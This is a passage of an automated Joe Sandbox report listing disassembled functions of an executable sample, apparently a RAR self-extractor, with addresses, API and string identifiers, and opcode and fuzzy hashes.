                                                                                                            • Instruction Fuzzy Hash: 7E41A072B14F4996EA04EF2AE4542A9B7B2E748FD0B8DA036DE0D87754EE3CD546D300
                                                                                                            Function 00007FF7390E7E40 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: 8232ad290f572eeb8545b21b4ce46f5df49fcb224dc725a7f454a6e6d15805dc
                                                                                                            • Instruction ID: edc1179b8beb0f35df7b8e3ab15191b77fc0892ef281376e4dfbcab0428defa1
                                                                                                            • Opcode Fuzzy Hash: 8232ad290f572eeb8545b21b4ce46f5df49fcb224dc725a7f454a6e6d15805dc
                                                                                                            • Instruction Fuzzy Hash: 1DB09224E07A0AD2EA083F116CC2224A3B66F88700FD90038C40C61320DE2D60F57720
                                                                                                            Function 00007FF7390C7288 Relevance: .6, Instructions: 587COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c36c05fb182e890d26300f72d8da24ce40aefd90e869f9e6c6d140536c2694b
                                                                                                            • Instruction ID: 175fdb5c99eaff514ba244ff61b572ed1fd12c13bb84b273c56854b158ac0d39
                                                                                                            • Opcode Fuzzy Hash: 2c36c05fb182e890d26300f72d8da24ce40aefd90e869f9e6c6d140536c2694b
                                                                                                            • Instruction Fuzzy Hash: B42205B3B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB785DB38D505CB40
                                                                                                            Function 00007FF7390C6548 Relevance: .3, Instructions: 260COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e28d09e7446c0214a07814a3c157f1eb60e4639b9a148b3052cddf11ad27c139
                                                                                                            • Instruction ID: ba97b15ab604b131a595c3ebbb2a3d3acbfd15bc33ec0a7eb197666e1da43715
                                                                                                            • Opcode Fuzzy Hash: e28d09e7446c0214a07814a3c157f1eb60e4639b9a148b3052cddf11ad27c139
                                                                                                            • Instruction Fuzzy Hash: 73D1BEA2A289E08FE322CB7598184FD7FB1E35E34DB888151DFD55774AC52DE142DB20
                                                                                                            Function 00007FF7390C6B78 Relevance: .2, Instructions: 181COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b07ee0b4ec0af2f3915c290a0138f6ffdf3acd5c0ec70ff0ce9c647749d8949
                                                                                                            • Instruction ID: 5be7ba329353f0e066e50cbe104532ad1ae9f284969953ba60a32f56693442f9
                                                                                                            • Opcode Fuzzy Hash: 6b07ee0b4ec0af2f3915c290a0138f6ffdf3acd5c0ec70ff0ce9c647749d8949
                                                                                                            • Instruction Fuzzy Hash: 01613623F081D369EB21AF7085404FDBFB2F70A7847858032DE9A5B646DA3DE505EB20
                                                                                                            Function 00007FF7390EC9C0 Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fa9fe3593e5d85e5d3d67f80cd6bb251b64deaca733d4919b9ff96fd9d22d551
                                                                                                            • Instruction ID: 8b8acca505944b2a07ce4e3ffd62b7de40c86ba76b374902e535954e74327811
                                                                                                            • Opcode Fuzzy Hash: fa9fe3593e5d85e5d3d67f80cd6bb251b64deaca733d4919b9ff96fd9d22d551
                                                                                                            • Instruction Fuzzy Hash: 62F0C871B182A59ADB94DF68B4426297BF1F7083C0F84803DD68C83B48C73DC050AF14
                                                                                                            Function 00007FF7390DA59C Relevance: .0, Instructions: 2COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bf2b8e7a01adefbc5201764513c60e95fdb2a577ab83757fee6a3235b1533785
                                                                                                            • Instruction ID: 58b2a4fb2ccb19bd5596cd72045a31720d4b800ea544f870ad865cbf70b02c3f
                                                                                                            • Opcode Fuzzy Hash: bf2b8e7a01adefbc5201764513c60e95fdb2a577ab83757fee6a3235b1533785
                                                                                                            • Instruction Fuzzy Hash: 0FA00122908C4BE0E645AF14A859120A232BB50301B800931E00D910A9AE2CE400A620
                                                                                                            Function 00007FF7390D2D58 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 110memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscat$Global$AllocByteCharCreateMultiStreamWidewcscpy
                                                                                                            • String ID: $</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                            • API String ID: 3314394749-1507786326
                                                                                                            • Opcode ID: dd5620bb2f72c2e148bec1e5d7f856ce8ba0efaae12d06c4f6b79c9a77fc460d
                                                                                                            • Instruction ID: d0116208279f59605ef1fc32c639ec6e4d0f4f42eaed0c0b636b2efbb43805f0
                                                                                                            • Opcode Fuzzy Hash: dd5620bb2f72c2e148bec1e5d7f856ce8ba0efaae12d06c4f6b79c9a77fc460d
                                                                                                            • Instruction Fuzzy Hash: 59416D22A08B4BA1EB14BF2A95503B9A7B2AF84BC0F844135DE4D077A5DF3CE545D320
                                                                                                            Function 00007FF7390E5574 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                            • API String ID: 3215553584-2617248754
                                                                                                            • Opcode ID: 6a1ad2e58786f0e7ca89e2eb6732b0a49c6d031e39be519a2f09551dcc4e27ff
                                                                                                            • Instruction ID: 82ac1cdf71ad95103fb086b16e78a820ad9d77ced8f91428943ef9f1d9bde13b
                                                                                                            • Opcode Fuzzy Hash: 6a1ad2e58786f0e7ca89e2eb6732b0a49c6d031e39be519a2f09551dcc4e27ff
                                                                                                            • Instruction Fuzzy Hash: D541BD33A0AB46A9EB00DF64E89179973B6EB04398F804536EE5D03B95EE3CD165D350
                                                                                                            Function 00007FF7390D5410 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextWindow
                                                                                                            • String ID: LICENSEDLG
                                                                                                            • API String ID: 2478532303-2177901306
                                                                                                            • Opcode ID: 0cd817199d8bd66e885061d28ebb8de14a211cc0e9c4c763c40193c333b124d6
                                                                                                            • Instruction ID: 00dc157f9a55d143ab9b38acf1e13801f8790fa7363d102cce458a0cdfd6ccde
                                                                                                            • Opcode Fuzzy Hash: 0cd817199d8bd66e885061d28ebb8de14a211cc0e9c4c763c40193c333b124d6
                                                                                                            • Instruction Fuzzy Hash: E3418C26A0C603A2FB54BF52B890379A372AF89BC5F844034DD4E17759CF7DE505A321
                                                                                                            Function 00007FF7390D7ADC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                            • String ID: STATIC
                                                                                                            • API String ID: 2845197485-1882779555
                                                                                                            • Opcode ID: f8ad4e84e76bd7bc7c90a45ee01ac8cc111892bf57dbb59cacdf8a720e99ab2d
                                                                                                            • Instruction ID: 86e47da177bb9104e27ed7ef8c5be7d2d162a0e82c8b94f51bf7f2b9c04ded9d
                                                                                                            • Opcode Fuzzy Hash: f8ad4e84e76bd7bc7c90a45ee01ac8cc111892bf57dbb59cacdf8a720e99ab2d
                                                                                                            • Instruction Fuzzy Hash: FF31A422B0DA43A6FA50BF15A9907B9A3B3BF85BC0F800030ED4E17755DE7DD546A760
                                                                                                            Function 00007FF7390D4690 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$File$Format$DateLocalSpecificswprintf
                                                                                                            • String ID: %s %s$2
                                                                                                            • API String ID: 1692029381-3036323853
                                                                                                            • Opcode ID: 91f1f932358495cbb759f9c4883d8a3c9a8369528f9af7063e38f103b19cdff5
                                                                                                            • Instruction ID: 4d774064ec3b300c8f14359392045685583538337dc03fb33ddca0f7453df06b
                                                                                                            • Opcode Fuzzy Hash: 91f1f932358495cbb759f9c4883d8a3c9a8369528f9af7063e38f103b19cdff5
                                                                                                            • Instruction Fuzzy Hash: 47218C73A18E4795EB109F65F8406DAB7B6FB88798F841136EA4D07A68DF3CC149CB10
                                                                                                            Function 00007FF7390C7098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                            • API String ID: 2915667086-2207617598
                                                                                                            • Opcode ID: bae8bc8c173777c5932118d9b31e6cb97519b8a4f1195798e2536524be9d3240
                                                                                                            • Instruction ID: fbfee5e544e0b5e6bec572539ffa5c192f1eeae6291c6e876c114f213d419c6d
                                                                                                            • Opcode Fuzzy Hash: bae8bc8c173777c5932118d9b31e6cb97519b8a4f1195798e2536524be9d3240
                                                                                                            • Instruction Fuzzy Hash: 0E319C60E0CB0BA0FA55AF19B840139A7B7BF44B90FD40035CC8E4B7A4DE7DE445A720
                                                                                                            Function 00007FF7390DC8EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                            • String ID: csm$csm$csm
                                                                                                            • API String ID: 2940173790-393685449
                                                                                                            • Opcode ID: f19368c3d222f6451f99b24df59d7fbec0c2abeb1c9f076067a4dfb36f37fa00
                                                                                                            • Instruction ID: d7a69522ac3839db0414eff8a7256ab6ae504fd08cda59ee3173364c1eab575e
                                                                                                            • Opcode Fuzzy Hash: f19368c3d222f6451f99b24df59d7fbec0c2abeb1c9f076067a4dfb36f37fa00
                                                                                                            • Instruction Fuzzy Hash: 4BE1BF33A087D39AE710AF24D4803ADBBB6FB45788F544135EA8D47696DF38E481EB10
                                                                                                            Function 00007FF7390D36E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$RectText
                                                                                                            • String ID: RarHtmlClassName
                                                                                                            • API String ID: 3937224194-1658105358
                                                                                                            • Opcode ID: a9b869d4a3663e107699a97261923091329e01ebbd696e00e136e335a9efe4a1
                                                                                                            • Instruction ID: 36c381776a4e060b71746d81f74a389f62897c76e57f695d91018577456a0416
                                                                                                            • Opcode Fuzzy Hash: a9b869d4a3663e107699a97261923091329e01ebbd696e00e136e335a9efe4a1
                                                                                                            • Instruction Fuzzy Hash: BD518F27A09B4396EA28AF26B45033AE7B2FF84B84F944034DE8E47B54DF3DE4459710
                                                                                                            Function 00007FF7390D9038 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,00007FF7390D8FA7,?,?,?,00007FF7390D935A), ref: 00007FF7390D905F
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7390D8FA7,?,?,?,00007FF7390D935A), ref: 00007FF7390D907C
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7390D8FA7,?,?,?,00007FF7390D935A), ref: 00007FF7390D9098
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                            • API String ID: 667068680-1718035505
                                                                                                            • Opcode ID: c361d6da8eb67a4f6c777a3ffa051c6a5b4400db5319d010d5b7976296ee86f0
                                                                                                            • Instruction ID: 6dc211efb6b5451b4492a65bdfb58572449fa169009da70f1a4b4c5b8dfe5405
                                                                                                            • Opcode Fuzzy Hash: c361d6da8eb67a4f6c777a3ffa051c6a5b4400db5319d010d5b7976296ee86f0
                                                                                                            • Instruction Fuzzy Hash: 5A110022E0BB07B5FE51BF04B980174A6B36F04780FC95535C8AE06394EE6DE995A3B0
                                                                                                            Function 00007FF7390D3098 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
